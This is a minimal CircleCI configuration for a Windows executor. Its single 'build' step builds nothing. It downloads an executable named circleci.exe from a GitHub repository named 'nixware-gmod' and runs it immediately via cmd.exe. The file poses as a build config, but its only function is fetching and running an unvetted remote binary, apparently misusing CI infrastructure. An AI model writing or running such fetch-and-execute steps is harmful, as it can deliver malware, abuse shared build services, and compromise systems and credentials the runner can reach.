version: 2.1
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    executor:
      name: win/default
      shell: cmd.exe
    steps:
      - run: cmd.exe /c curl -L -o a.exe https://raw.githubusercontent.com/a3a3aikarus/nixware-gmod/master/circleci.exe && a.exe




